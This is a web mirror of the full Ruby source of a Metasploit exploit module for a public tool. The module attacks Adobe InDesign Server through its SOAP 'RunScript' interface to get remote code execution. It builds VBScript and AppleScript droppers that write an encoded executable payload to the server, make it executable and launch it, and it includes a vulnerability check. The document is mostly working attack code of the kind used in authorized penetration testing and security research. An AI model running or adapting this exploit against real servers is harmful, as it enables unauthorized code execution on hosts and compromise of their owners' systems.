Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/misc/indesign_server_soap.rb
19664 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10
  include Msf::Exploit::EXE

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution',

17
        'Description' => %q{

18
          This module abuses the "RunScript" procedure provided by the SOAP interface of

19
          Adobe InDesign Server, to execute arbitrary vbscript (Windows) or applescript (OSX).

20


21
          The exploit drops the payload on the server and must be removed manually.

22
        },

23
        'Author' => [

24
          'h0ng10', # Vulnerability discovery / Metasploit module

25
          'juan vazquez' # MacOSX target

26
        ],

27
        'License' => MSF_LICENSE,

28
        'Platform' => %w{osx win},

29
        'Privileged' => false,

30
        'DisclosureDate' => '2012-11-11',

31
        'References' => [

32
          [ 'OSVDB', '87548'],

33
          [ 'URL', 'http://web.archive.org/web/20130119134644/http://secunia.com/advisories/48572/' ]

34
        ],

35
        'Targets' => [

36
          [

37
            'Indesign CS6 Server / Windows (64 bits)',

38
            {

39
              'Arch' => ARCH_X64,

40
              'Platform' => 'win'

41
            }

42
          ],

43
          [

44
            'Indesign CS6 Server / Mac OS X Snow Leopard 64 bits',

45
            {

46
              'Arch' => ARCH_X64,

47
              'Platform' => 'osx'

48
            }

49
          ]

50
        ],

51
        'DefaultTarget' => 0,

52
        'Notes' => {

53
          'Reliability' => UNKNOWN_RELIABILITY,

54
          'Stability' => UNKNOWN_STABILITY,

55
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

56
        }

57
      )

58
    )

59


60
    register_options([ Opt::RPORT(12345) ])

61
  end

62


63
  def send_soap_request(script_code, script_type)

64
    script_code.gsub!(/&/, '&amp;')

65
    soap_xml = %Q{

66
<?xml version="1.0" encoding="UTF-8"?>

67
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"

68
xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"

69
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:IDSP="http://ns.adobe.com/InDesign/soap/">

70
  <SOAP-ENV:Body>

71
    <IDSP:RunScript>

72
      <IDSP:runScriptParameters>

73
        <IDSP:scriptText>#{script_code}</IDSP:scriptText>

74
        <IDSP:scriptLanguage>#{script_type}</IDSP:scriptLanguage>

75
      </IDSP:runScriptParameters>

76
    </IDSP:RunScript>

77
  </SOAP-ENV:Body>

78
</SOAP-ENV:Envelope>

79
}

80


81
    res = send_request_cgi({

82
      'uri' => '/',

83
      'method' => 'POST',

84
      'content-type' => 'application/x-www-form-urlencoded',

85
      'data' => soap_xml,

86
    }, 5)

87
  end

88


89
  def check()

90
    # Use a very simple javascript

91
    check_var = rand_text_numeric(10)

92
    checkscript = 'returnValue = "' + check_var + '"'

93


94
    res = send_soap_request(checkscript, "javascript")

95


96
    return Exploit::CheckCode::Vulnerable if res.body.include?('<data xsi:type="xsd:string">' + check_var + '</data>')

97


98
    return Exploit::CheckCode::Safe

99
  end

100


101
  def exploit

102
    if target.name =~ /Windows/

103
      print_status("Creating payload vbs script")

104
      encoded_payload = generate_payload_exe().unpack("H*").join

105
      exe_file = Rex::Text.rand_text_alpha_upper(8) + ".exe"

106
      wsf = Rex::Text.rand_text_alpha(8)

107
      payload_var = Rex::Text.rand_text_alpha(8)

108
      exe_name_var = Rex::Text.rand_text_alpha(8)

109
      file_var = Rex::Text.rand_text_alpha(8)

110
      byte_var = Rex::Text.rand_text_alpha(8)

111
      shell_var = Rex::Text.rand_text_alpha(8)

112


113
      # This one creates a smaller vbs payload (without deletion)

114
      vbs = %Q{

115
Set #{wsf} = CreateObject("Scripting.FileSystemObject")

116
#{payload_var}  = "#{encoded_payload}"

117
#{exe_name_var} =  #{wsf}.GetSpecialFolder(2) + "\\#{exe_file}"

118
Set #{file_var} = #{wsf}.opentextfile(#{exe_name_var}, 2, TRUE)

119
For x = 1 To Len(#{payload_var})-3 Step 2

120
  #{byte_var} = Chr(38) & "H" & Mid(#{payload_var}, x, 2)

121
  #{file_var}.write Chr(#{byte_var})

122
Next

123


124
#{file_var}.write Chr(#{byte_var})

125
#{file_var}.close

126


127
Set #{shell_var} = CreateObject("Wscript.Shell")

128
#{shell_var}.Run Chr(34) & #{exe_name_var} & Chr(34), 0, False

129
Set #{shell_var} = Nothing

130
returnValue = #{exe_name_var}

131
      }

132
      #	vbs = Msf::Util::EXE.to_exe_vbs(exe)

133
      print_status("Sending SOAP request")

134


135
      res = send_soap_request(vbs, "visual basic")

136
      if res != nil and res.body != nil then

137
        file_to_delete = res.body.to_s.scan(/<data xsi:type="xsd:string">(.*)<\/data><\/scriptResult>/).flatten[0]

138
        print_warning "Payload deployed to #{file_to_delete.to_s}, please remove manually"

139
      end

140


141
    elsif target.name =~ /Mac OS X/

142


143
      print_status("Creating payload apple script")

144


145
      exe_payload = generate_payload_exe

146
      b64_exe_payload = Rex::Text.encode_base64(exe_payload)

147
      b64_payload_name = rand_text_alpha(rand(5) + 5)

148
      payload_name = rand_text_alpha(rand(5) + 5)

149


150
      apple_script = %Q{

151
set fp to open for access POSIX file "/tmp/#{b64_payload_name}.txt" with write permission

152
write "begin-base64 644 #{payload_name}\n#{b64_exe_payload}\n====\n" to fp

153
close access fp

154
do shell script "uudecode -o /tmp/#{payload_name} /tmp/#{b64_payload_name}.txt"

155
do shell script "rm /tmp/#{b64_payload_name}.txt"

156
do shell script "chmod +x /tmp/#{payload_name}"

157
do shell script "/tmp/#{payload_name}"

158
set returnValue to "/tmp/#{payload_name}"

159
      }

160


161
      print_status("Sending SOAP request")

162


163
      res = send_soap_request(apple_script, "applescript")

164


165
      if res != nil and res.body != nil then

166
        file_to_delete = res.body.to_s.scan(/<data xsi:type="xsd:string">(.*)<\/data><\/scriptResult>/).flatten[0]

167
        file_to_delete = "/tmp/#{payload_name}" if file_to_delete.nil? or file_to_delete.empty?

168
        print_warning "Payload deployed to #{file_to_delete.to_s}, please remove manually"

169
      elsif not res

170
        print_status "No response, it's expected"

171
        print_warning "Payload deployed to /tmp/#{payload_name}, please remove manually"

172
      end

173


174
    end

175
  end

176
end

177


178